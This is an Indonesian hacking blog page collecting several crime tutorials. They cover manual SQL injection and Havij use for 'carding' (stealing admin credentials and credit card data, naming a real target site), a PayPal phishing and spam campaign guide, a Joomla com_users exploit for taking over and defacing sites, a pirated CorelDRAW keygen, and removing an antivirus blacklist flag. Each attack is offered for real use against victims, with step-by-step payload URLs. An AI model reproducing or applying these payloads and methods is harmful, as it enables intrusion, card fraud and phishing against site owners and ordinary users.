Latest Updates

Tutorial carding sql injection manual



SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter : id=$id;……. > Got Error

Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url

Dork List  : HERE!!

Contoh :
http://impgang dot com/news.php?id=14’
http://impgang dot com/news.php?id=’14


Apabila terlihat pesan error seperti ini :

u have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1


Maka bisa dipastikan situs tersebut terdapat bug SQL Injection :D

Lalu lanjut lagi menentukan Jumlah Kolom

caranya :

 http://www.site.com/news.php?id=7 order by 1-- || Gak Error

http://www.site.com/news.php?id=7 order by 2-- || Gak Error

http://www.site.com/news.php?id=7 order by 3-- || Gak Error

http://www.site.com/news.php?id=7 order by 4-- || Gak Error

http://www.site.com/news.php?id=7 order by 5-- || Gak Error

http://www.site.com/news.php?id=7 order by 6-- || Gak Error

http://www.site.com/news.php?id=7 order by 7-- || error



Nah kita mengetahui kalau kolom ke 7 itu Error artinya Website hanya memiliki 6 Kolom karena pada kolom nomor 7 sudah tidak ada hubungannya dengan kolom yang lainnya.
Jika kita membuka kolom yang Error maka terlihat seperti ini:

Unknown column '7' in 'order clause'



Lalu selanjutnya kita gunakan perintah fungsi union untuk menampilkan area kolom yang vuln . Gunakan perintah "Union Select" tanpa tanda petik.
caranya, ganti kata "order by" menjadi "Union Select", lalu setelah "id=" kita tambahkan saja tanda (-) gak pake tanda kurung lalu jika error tepat pada angka yg vuln (contoh angka 7) maka kalian urutkan dari angka 1 sampai 6 karena angka 7 Error.

Terlihat seperti ini:

Sebelum
http://www.site.com/news.php?id=7 order by 6-- (Karena Angka 7 Error Maka di ganti menjadi 6)

Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,4,5,6--

jika berhasil seharusnya kita bisa melihat area kolom yang vuln.
maksudnya begini, area kolom yang vuln itu adalah nomor yang barusan kita buat lalu terpampang di website . Jadi begini, kalian sudah mencari vuln dengan urutan 1,2,3,4,5,6 . maka dari urutan 1,2,3,4,5,6 pasti akan terpampang salah satu nomor tersebut di website.

Next setelah itu kita akan mencoba Cek Versi MYSQL yang digunakan
untuk mengetahui versi mysql kita gunakan "@@version" atau "version()" tanpa tanda petik.Dari hasil sebelumnya, sekarang kita gunakan untuk mengecek versi mysql, caranya ikuti langkah berikut. Misalkan kolom yang vuln yang tampil adalah nomor 4 maka ganti saja kolom 4 dengan "@@version" sehingga urlnya menjadi:

Sebelum
    http://www.site.com/news.php?id=-7 union select 1,2,3,4,5,6--

    Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,@@version,5,6--

Sekarang kita bisa melihat versinya seperti 5.0.96 atau versi yang lainnya tetapi versi harus memiliki angka 5 didepannya.

Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah "@@version" dengan "group_concat(table_name)" dan menambahkan perintah "from information_schema.tables where table_schema=database()" sesudah angka terakhir , sebelum tanda --
Contohnya begini:

    Sebelum
    http://www.site.com/news.php?id=-7 union select 1,2,3,@@version,5,6--

    Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--

Nah terlihat ada nama table table di site yg kalian praktekkan
misalnya terlihat ada table admin, research, vcounter
maka kita akan memproses table admin sehingga kita mendapatkan Username dan Passwordnya, tetapi sayangnya, tidak semua website langsung menampakkan Table admin,tapi kalian bisa cari disatu-satu table yang muncul disite kalian.

Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Cara mengganti perintah "group_concat(table_name)" dengan perintah "group_concat(column_name)" dan mengganti perintah "information_schema.tables" menjadi "information_schema.columns" juga mengganti perintah "table_schema=database()" dengan perintah "table_name=" lalu menambahkan nama tablenya tapi yg sudah di convert menjadi hex sesudah tanda (=) tanpa tanda kurung dan diawali dengan 0x . Ini website untuk convert Text menjadi Hex
Contohnya begini:
Admin < Ini Text
lalu di convert ke Hex dan tambahkan "0x" diawal maka jadilah
Admin(text) -> 61646d696e(hex) -> 0x61646d696e(table)
nah jadi terlihat link seperti ini:

    Quote:Sebelum
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--

    Contoh Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=HASIL CONVERT TEXT KE HEX--

    Note :HASIL CONVERT TEXT KE HEX yaitu hasil convert dari nama table yang barusan kalian Convert

    Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x61646d696e--

nah tiba-tiba muncul kolom id,admin_id,admin_pass pada tabel admin tadi.

Oke selanjutnya cara mengeluarkan data column,caranya cukup gampang
kalian tinggal mengganti "group_concat(column_name)" menjadi "group_concat(admin_id,0x3a,admin_pass)" lalu ganti "information_schema.columns where table_name=CODEHEX--" menjadi "admin"

Question : mengapa saya masukkan admin_id,0x3a,admin_pass dan apa maksud dari 0x3a lalu kenapa "information_schema.columns where table_name=CODEHEX" diganti menjadi "admin"?

Answer : karena admin_id dan admin_pass adalah nama kolom pada tabel Admin yang barusan saya convert ke Hex.
kalau 0x3a itu sebenarnya Code jika kita convert ke hex itu artinya (:) titik dua. saya menggantinya karena perintah itu tidak digunakan lagi karena kita sudah menemukan Tabel dan Kolomnya dan makanya saya hapus Information_schema.columns... dan menggantinya menjadi admin karena kita akan membongkar isi tabel tersebut.


WARNING:JANGAN SAMAKAN NAMA TABEL CONTOH INI DENGAN NAMA TABEL YANG SEDANG ANDA PRAKTEKKAN

Maka terlihat seperti ini:

    Sebelum
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x61646d696e--

    Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(admin_id,0x3a,admin_pass),5,6 from admin--

Akhirnya berhasil.. kalian akan mendapatkan username dan password admin diwebsite yang barusan kalian praktekan
contohnya seperti ini:


Setelah itu cari halaman login admin di website setelah itu loginkan username adminnya dan dump semua databasenya.
ccc42d37fd8005203f05e375d95218348a647b70ffc4aa7763

Nb : sumber HN
untuk cara havij klik 
untuk cara sqlmap klik

Tutorial Carding dengan havij

Assalamualaikum, saya akan berbagi sedikit trik carding menggunakan Havij, langsung saja ke TKP biar prakteknya cepat selesai
- yang dibutuhkan :
  • Havij versi 1.16 ( download disini <== )
  • Dork bisa dilihat disini  <==
  • kesabaran
- cari dulu target kita di google, dengan menggunakan dork diatas
- pilih target anda, disini saya menargetkan  http://www.a-k-a.net/prod_detail.php?id=2  sebagai korban
- setelah itu buka Havij yang sudah di download tadi, terus paste Url korban di kolom target, lalu klik  tombol Analyze di sebelah kanan target



- tunggu sampai Havij selesai melakukan proses Scaning,tuh Database nya udah kelihatan, lalu klik icon tables
- centang Databasenya lalu klik lagi icon get Tables, maka Havij akan melakukan scaning database dan akan mencari tabel yang ada di dalam database tersebut.


- jika semua daftar tabel sudah kelihatan, kita pilih salah satu tabel yang menyimpan informasi CC, biasanya ada ditabel dengan nama order,konsumen,member, atau yang sejenisnya.
disini saya temukan tabelnya dengan nama tblorders
- lalu centang tabel tersebut, lalu klik icon Get columns. proses scanning akan berjalan


- tuh kolomnya udah muncul, kita tinggal centang semua kolom yang kita inginkan, lalu kita klik icon Get data.


- tinggal kita tungguin aja sampai Havij selesai ngambil data nya. kalo mau datanya disimpan klik icon Save data
gampang kan ???  tinggal kita gunain aja ntuh hasil CC nya.

sekian dari saya, saya tidak bertanggung jawab atas hal - hal yang tidak diinginkan karenan ini hanyalah pembelajaran semata.

terima kasih dan sampai jumpa, :D
untuk cara manual klik
untuk cara sqlmap klik

Corel draw x4

kali ini saya mau berbagi software CorelDraw X4
Siapa yang tidak tau dengan software yang satu ini?? 
Hampir semua pengguna PC tau akan software ini. ya, 
CorelDraw Graphics Suite X4 merupakan software desain berbasis vektor yang paling banyak dicari dan digunakan oleh para desainer. 
meski saat ini sudah ada versi terbarunya, 
CorelDRAW X4 ini saya rasa sangat pas bagi yang memiliki komputer dengan spesifikasi yang rendah sekalipun karena terdapat management memory yang akan mengurangi penggunaan RAM.   
Selain mudah digunakan, CorelDraw X4 untuk saat ini juga telah di lengkapi dengan fasilitas-fasilitas pendukung yang memudahkan para desainer untuk mendesain sesuatu.


CorelDRAW X4 Full version + Keygen

Hello ? :D 
ketemu lagi sama saya Mr.HaurgeulisX196
kali ini saya mau berbagi software CorelDraw X4
Siapa yang tidak tau dengan software yang satu ini?? 
Hampir semua pengguna PC tau akan software ini. ya, 
CorelDraw Graphics Suite X4 merupakan software desain berbasis vektor yang paling banyak dicari dan digunakan oleh para desainer. 
meski saat ini sudah ada versi terbarunya, 
CorelDRAW X4 ini saya rasa sangat pas bagi yang memiliki komputer dengan spesifikasi yang rendah sekalipun karena terdapat management memory yang akan mengurangi penggunaan RAM.   
Selain mudah digunakan, CorelDraw X4 untuk saat ini juga telah di lengkapi dengan fasilitas-fasilitas pendukung yang memudahkan para desainer untuk mendesain sesuatu.









CorelDRAW X4 ini saya bagikan full versi lengkap dengan keygen dan cara aktifasinya.

.Persyaratan System :
 

1. Windows® XP (with Service Pack 2 or later) Windows Vista® (32-bit or 64-bit editions) or Windows® 7 (with Service Pack 2 or later)
2. 512 MB of RAM, 430 MB of hard disk space
3. Pentium® III, 800 MHz processor or AMD Athlon™
4. 1024 × 768 or better monitor resolution
5. Mouse or tablet
 
Untuk installer CorelDRAW  X4 DOWNLOAD DISINI
Untuk keygen dan cara aktifasinya DOWNLOAD DISINI

How to be a spammer

How to be a spammer
siapin rokok surya biar sama kayak ane gan + secangkir kopi ngga usah sebaskom nanti mencr*t2 kwkwkwkw, yuk ah lanjut kebawah

Persiapan:
1) Hosting (cPanel)
Usahakan cari hosting yang support untuk send mail, karena jika tidak support send mail maka result dari scampage tidak dapat masuk ke email kita

2) Domain
Gunakan domain .com, usahakan mirip2 dengan paypal.
Contoh: payypai.com, payepal.com, paiypal.com
intinya kreasikan yang menurut ente mirip dengan kata paypal

3) Script scampage
usahakan cari script yg benar2 clean, kenapa? karena bisa saja scampage ente ke detect phising karena file2nya sudah di detect sama pihak google dll.. dan usahakan liat2 scriptnya karena bisa jadi ada email selain email ente yg nyangkut jadi dia bisa nikmati hasil scampage ente jg.

3) Mailer
Carilah Hosting yg seperti point pertama & upload script mailer ente walaupun ente udah ngetest mailernya ke email ente tapi masuk spam, tetap ngirim aja karena ngga ada yang tau kalo di email orang lain masuk inbox dan 1 lagi webmail atau mailist ente pasti tidak hanya yahoo, outlook, gmail, hotmail tapi masih banyak webmail2 lain yg blum kta ketahui securitynya seperti @icloud @aol dll... jadi tetap ngirim aja.

4) Mailist
Mailist itu adalah email2 yang dimana nantinya kta gunakan untuk mengirim pesan scampage agar dia membuka email tsb dan menuju ke scampage yg kita buat dan ingat mailist itu bisa didapatkan dari hasil dump.

5) Letter
Letter ini berguna sebagai isi pesan scampage kita, yg didalamnya ada kata2 bahwa akun paypalnya sedang dalam bermasalah dan harus update informasi dan tentunya jg harus tertera link scampage ente

6) SMTP
kalo soal SMTP ane ngga bisa kasih tau banyak, mungkin kebanyakan para spammer mengandalkan SMTP tapi menurut saya tidak dengan mailer web pun bisa mendapatkan result asal rajin2 cari hosting untuk dijadikan penempatan mailer.

Tutorial:
1) Buka cPanel, usahakan domain sudah connect ke cPanel
2) Upload script scampage
3) ubah script2 yg perlu di ubah misalkan email untuk mengirim hasil result dll...
4) test scampage ente untuk mencoba bahwa itu work dan siap menampung bule2 untuk terjebak ke scampage ente
5) buka web mailer ente, isi di web mailer ente yg perlu di isi lalu send ke mailist2 ente.
6) selesai, sisa menunggu result, belum dapat result? coba lagi gan, karena menjadi spammer itu ngga ada yg instan hehe, kalo mie instan mungkin ada gan.

Tutor ini bukan untuk di perjualbelikan melainkan untuk di share dan di pahami bareng2 & jika ingin copas tutor ini harap sertakan creditnya untuk menghargai.

Adolf Hitler pernah berkata
"Teruslah mencoba dan jangan menyesal dari apa yang anda lakukan tapi tersenyumlah dan bahagia lah karena anda sudah berhasil melakukan tinggal cara mencobanya dan tetap berusaha untuk mendapatkan hasil maksimal"

untuk download script scampage nya bisa disini
scampage download disini
latter download disini
mailer download disini

untuk tutorial klik

Cara mengatasi Smadav ke Blacklist

Cara mengatasi Smadav ke Blacklist
Anda ketahauan smadav palssu????
dan smadav anda menjadi hitam seperti ini


 begini caranya :

MENGHILANGKAN BLACKLIST SMADAV AV

1. Exit SMADAV (Klik Kanan Tray Icon - EXIT)

2. Disconnect Koneksi Internet

3. Jalankan regedit ( RUN > REGEDIT )

4. Cari HKEY_CURRENT_USERS/SOFTWARE/MICROSOFT/NOTEPAD

5. Hapus key yang berawalan IfPitchAndFamily, IfPitch?ndFamily, IfPitch?ndFamily3.

6. Close Regedit

7. Jalankan SMADAV

mudahkan

Jika ada masalah, hubungi saya di :


Cara deface web dengan com user

Com_User adalah salah satu teknik Exploit Joomla yang paling banyak diminati oleh defacer-defacer yang ada di indonesia dan bahkan di seluruh dunia. Com_User / Teknik Exploit joomla! ini dapat di gunakan untuk CMS Joomla! yang menggunakan joomla! versi 1.6.x. / 1.7.x. / 2.5.x.


Apa sih CMS Joomla itu?

Joomla! adalah Sistem manajemen konten (SMK atau CMS) yang bebas dan terbuka (free opensource) ditulis menggunakan PHP dan basisdata MySQL untuk keperluan di internet maupun intranet. Joomla pertamakali dirilis dengan versi 1.0.0. Fitur-fitur Joomla! diantaranya adalah sistem caching untuk peningkatan performansi, RSS, blogs, poling, dll. Joomla! menggunakan lisensi GPL.
Asal kata Joomla sendiri berasal dari kata Swahili jumla yang mengandung arti "kebersamaan".
(sumber dari wikipedia.org)

Bahan bahan
langkah2

1. Cari web target dengan menggunakan mesin pencari dengan "dork"
2. Setelah mendapatkan suatu web yang menggunakan CMS Joomla!, lalu cobalah membuka halaman administrator untuk memastikan apakah webnya "vuln" atau tidak (Vuln = kelemahan)                         ini yg vuln





Note: "Perbedaan Site Vuln dengan yang lainnya, terlihat pada bagian bawah atau footer Admnistration Login pada web Joomla nya."

*Web yang menggunakan "versi 1.6.x dan 2.5.x" itu bukan berarti sitenya tidak tidak bisa di deface/tidak vuln, hanyasaja web yang seperti itu peluangnya dapat di defacenya  hanya 25% dari keseluruhan web joomla seperti gambar diatas. Tapi jika anda telah lama mendeface web dengan cara ini, anda akan mengetahui ciri-ciri Web Joomla yang bisa di deface tanpa harus melihat halaman administratornya.
4. Setelah menemukan site yang "vuln". masukkan tambahan alamat berikut di belakang alamat/domain/url web sitenya.
index.php?option=com_users&view=registration

*misal, web yang akan saya deface adalah http://targetmu.com/joomla/ maka, saya harus menambahkan exploit di belakang alamat web tersebut menjadi http://targetmu.com/joomla/index.php?option=com_users&view=registration
5. setelah sudah mengikuti langkah diatas, anda akan masuk ke tempat registrasi.
*Jika saat anda pergi ke halaman registrasi, dan lalu web itu meredirect anda ke halaman login. Carilah target lain. Karena admin web itu sudah menghapus halaman registrasinya.
6 Setelah masuk ke tempat registrasi seperti gambar diatas. maka langkah selanjutnya adalah menekan tombol ctrl+u / klik kanan -> Lihat sumber laman dan akan muncul tampilan seperti gambar di bawah.
7. Cari kode hidden (dengan bantuan ctrl+f ) dan cari kode hidden seperti gambar di bawah ini. 
8. Copy code yang diberi kotak merah tersebut ke Exploit Joomla yang telah kamu download tadi.
9. Buka Exploit Joomla yang telah kamu download tadi dengan Notepad. Lalu kamu paste kode yang telah kamu copy tersebut dikotak merah kedua (yang di paling bawah). Dan masukkan alamat web yang telah di exploit tersebut. 
contoh: http://targetmu.com/joomla/index.php?option=com_users&view=registration ke kotak merah pertama yang terdapat di tempat paling atas.
*Jangan lupa mengganti alamat email dan username nya (terserah kamu )
*Password dibiarkan berbeda

10. Save file tersebut.
11. Lalu buka Exploit Joomla tersebut dengan web browser (google chrome/mozilla firefox )
12. Setelah di buka, maka akan muncul tampilan seperti gambar di bawah ini.
13. Setelah di buka dengan web browser dan muncul tampilan seperti gambar berikut. Lalu langkah selanjutnya adalah klik tombol Register yang terdapat di bagian bawah.
14. Lalu akan ada tulisan password yang anda masukkan tidak sama. (kalau di bahasa indonesia kan)
15. Ganti password tersebut (terserah anda) dan klik register kembali.
16. Setelah sukses, buka alamat link aktivasi yang terdapat di email anda.
*Jika alamat link aktivasi tidak masuk ke INBOX sebuah web, coba lah lihat di halaman SPAM. Dan jika tidak masuk kedua-duanya, cobalah reload/refresh email anda.
17. Setelah di klik link aktivasi pada email, maka anda telah menyelesaikan registrasi. dan anda bisa login kedalam halaman administrator. (tambahkan kode /administrator di belakang alamat web tersebut)
*misal alamat web nya adalah http://targetmu.com/joomla/ maka anda harus menambahkan /administrator di belakang web nya. seperti http://targetmu.com/administrator
18. Setelah itu anda masukkan username dan password, lalu login.
19. Taraaaa, sekarang anda sudah masuk kedalam halaman adminnya dan tinggal di tebas indexnya
(SUMBER : http://scupeid.blogspot.com)

Jika ada masalah, hubungi saya di :